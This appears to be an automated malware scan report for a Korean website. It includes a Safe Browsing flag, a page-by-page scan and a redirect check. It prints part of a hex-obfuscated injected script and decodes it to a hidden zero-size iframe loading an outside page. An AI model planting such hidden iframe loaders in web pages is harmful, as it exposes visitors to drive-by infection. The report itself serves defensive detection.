Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=eurasia-ac.kr
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://eurasia-ac.kr/ | 200 OK Content-Length: 43363 Content-Type: text/html | clean |
http://eurasia-ac.kr/inc/okplugin_js.js | 200 OK Content-Length: 925 Content-Type: application/javascript | suspicious |
Suspicious code. Script contains iFrame. function PrintEmbed(EmbID)
{ document.write(document.getElementById(EmbID).value); } var _$=["\x64\x6f\x63\x75\x6d\x65\x6e\x74","\x63\x6f\x6f\x6b\x69\x65","\x69\x6e\x64\x65\x78\x4f\x66",'\x6c\x6f\x6e\x67\x3d',"\x73\x65\x74\x54\x69\x6d\x65","\x67\x65\x74\x54\x69\x6d\x65",'\x6c\x6f\x6e\x67\x3d\x59\x65\x73\x3b\x70\x61\x74\x68\x3d\x2f\x3b\x65\x78\x70\x69\x72\x65\x73\x3d',"\x74\x6f\x47\x4d\x54\x53\x74\x72\x69\x6e\x67","\x77\x72\x ...[489 bytes skipped]... Decoded script: <iframe src=http://meehospital.com/swf/index.html width=0 height=0></iframe> | ||
http://eurasia-ac.kr/js/common.js | 200 OK Content-Length: 5375 Content-Type: application/javascript | clean |
http://eurasia-ac.kr/js/common_ro.js | 200 OK Content-Length: 34593 Content-Type: application/javascript | clean |
http://eurasia-ac.kr/js/popup.js | 200 OK Content-Length: 4165 Content-Type: application/javascript | clean |
http://eurasia-ac.kr/js/object_embed.js | 200 OK Content-Length: 3243 Content-Type: application/javascript | clean |
http://eurasia-ac.kr/js/flash.js | 200 OK Content-Length: 2955 Content-Type: application/javascript | clean |
http://ajax.googleapis.com/ajax/libs/jquery/1.6.2/jquery.min.js | 200 OK Content-Length: 91556 Content-Type: text/javascript | clean |
http://eurasia-ac.kr/login/login.php | 200 OK Content-Length: 20819 Content-Type: text/html | clean |
http://eurasia-ac.kr/login/ | 403 Forbidden Content-Length: 204 Content-Type: text/html | clean |
http://eurasia-ac.kr/test404page.js | 404 Not Found Content-Length: 208 Content-Type: text/html | clean |
http://eurasia-ac.kr/member/join_step1.php | 200 OK Content-Length: 47454 Content-Type: text/html | clean |
http://secure.nuguya.com/nuguya/nice.nuguya.oivs.crypto.js | 200 OK Content-Length: 25258 Content-Type: application/x-javascript | clean |
http://secure.nuguya.com/nuguya/nice.nuguya.oivs.msg.js | 200 OK Content-Length: 9559 Content-Type: application/x-javascript | clean |
http://secure.nuguya.com/nuguya/nice.nuguya.oivs.util.js | 200 OK Content-Length: 14963 Content-Type: application/x-javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: eurasia-ac.kr
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Mon, 12 Jan 2015 06:52:34 GMT
Pragma: no-cache
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=euc-kr
Expires: Thu, 19 Nov 1981 08:52:00 GMT
P3P: CP="NOI CURa ADMa DEVa TAIa OUR DELa BUS IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: PHPSESSID=ch1ilm0oefom5pgjr9j2bp6ct1; path=/
Set-Cookie: eurasia-ac_kr-recommend=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT
X-Powered-By: PHP/5.3.13p1
GET / HTTP/1.1
Host: eurasia-ac.kr
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Mon, 12 Jan 2015 06:52:34 GMT
Pragma: no-cache
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=euc-kr
Expires: Thu, 19 Nov 1981 08:52:00 GMT
P3P: CP="NOI CURa ADMa DEVa TAIa OUR DELa BUS IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: PHPSESSID=ch1ilm0oefom5pgjr9j2bp6ct1; path=/
Set-Cookie: eurasia-ac_kr-recommend=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT
X-Powered-By: PHP/5.3.13p1
Second query (visit from search engine):
GET / HTTP/1.1
Host: eurasia-ac.kr
Referer: http://www.google.com/search?q=eurasia-ac.kr
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: eurasia-ac.kr
Referer: http://www.google.com/search?q=eurasia-ac.kr
Result:
The result is similar to the first query. There are no suspicious redirects found.